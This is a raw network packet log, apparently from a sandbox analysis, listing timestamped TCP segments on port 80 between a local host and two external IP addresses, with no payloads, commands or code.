Sep 3, 2024 17:13:21.094028950 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.094151974 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.144897938 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.144915104 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.144929886 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.144958973 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.144992113 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.145189047 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.145203114 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.145250082 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.146197081 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.146212101 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.146225929 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.146241903 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.146255970 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.149610043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.149671078 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.149725914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.149744987 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.149765968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.149779081 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.149780035 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.149794102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.149806976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.149807930 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.149823904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.149837017 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.149842978 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.149853945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.149863005 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.149873018 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.149887085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.149904966 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.149923086 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.150083065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150096893 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150110006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150124073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150136948 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150142908 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.150149107 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.150152922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150166988 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150182009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150198936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150201082 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.150201082 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.150229931 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.150243998 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.150433064 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150445938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150460005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150474072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150491953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150506973 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.150506973 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.150520086 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.150574923 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150588989 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150602102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150615931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150616884 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.150629044 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.150631905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150649071 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.150672913 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.150911093 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150923967 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150937080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150950909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150964022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.150964975 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.150995016 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.150995016 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.151074886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.151089907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.151103973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.151117086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.151132107 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.151144981 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.151144981 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.151144981 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.151185036 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.151238918 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.151268959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.151282072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.151295900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.151309967 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.151326895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.151343107 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.151343107 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.151397943 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.151427984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.151442051 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.151454926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.151468992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.151480913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.151494980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.151501894 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.151501894 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.151510000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.151525021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.151556969 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.151556969 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152046919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152060986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152074099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152111053 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152111053 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152215004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152230024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152245998 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152259111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152268887 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152273893 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152288914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152295113 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152302980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152314901 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152318954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152328968 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152355909 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152359009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152374029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152386904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152401924 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152414083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152436972 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152436972 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152442932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152452946 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152456999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152472019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152498960 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152498960 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152512074 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152534962 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152546883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152560949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152574062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152579069 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152580023 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152590036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152604103 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152611971 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152616978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152633905 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152637005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152662992 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152674913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152687073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152715921 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152726889 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152859926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152873039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152892113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152906895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152915001 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152920961 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152929068 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152936935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152950048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152960062 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152960062 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152966976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152981997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.152982950 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.152983904 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.153003931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153016090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.153016090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.153021097 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153034925 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153050900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153055906 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.153055906 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.153065920 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153080940 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153084040 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.153084040 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.153094053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153098106 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.153125048 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.153125048 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.153171062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153183937 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153197050 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153212070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153224945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153234959 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.153234959 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.153239965 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153253078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153264046 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.153266907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153280973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153305054 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.153305054 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.153330088 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.153459072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153471947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153484106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153500080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153518915 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.153518915 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.153544903 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.153822899 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153837919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153851986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153918982 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.153918982 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.153975010 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.153986931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.154000998 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.154014111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.154016018 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.154026985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.154056072 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.154056072 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.154083967 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.244751930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.244770050 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.244781971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.244792938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.244807959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.244817019 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.244817972 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.244832993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.244839907 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.244847059 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.244870901 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.244872093 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.244934082 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.245033026 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245043993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245054960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245068073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245084047 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.245110989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.245110989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.245131016 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245141983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245152950 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245166063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245177031 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245183945 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.245187998 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245201111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245208025 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.245235920 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.245235920 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.245249033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245260000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245270014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245280981 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245282888 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.245291948 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245306969 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.245311022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245325089 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.245353937 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.245513916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245531082 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245542049 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245572090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.245596886 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.245666981 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245676994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245685101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245696068 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245707035 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245724916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.245724916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.245762110 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.245954037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245970011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245981932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245991945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.245999098 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.245999098 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.246005058 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.246015072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.246025085 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.246025085 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.246027946 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.246048927 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.246099949 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.246275902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.246287107 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.246296883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.246308088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.246313095 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.246320963 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.246330976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.246341944 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.246344090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.246344090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.246381998 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.246381998 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.246407986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.246418953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.246444941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.246593952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.246604919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.246618986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.246656895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.246656895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.246753931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.246766090 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.246776104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.246813059 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.246813059 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.246911049 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.246922970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.246968985 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.246968985 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.247694969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.247730970 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.247756004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.247767925 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.247812986 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.247843981 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.247854948 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.247865915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.247875929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.247886896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.247905016 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.247905016 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.247957945 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.248120070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248131990 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248142004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.248152971 CEST	80	49730	52.212.52.84	192.168.2.8
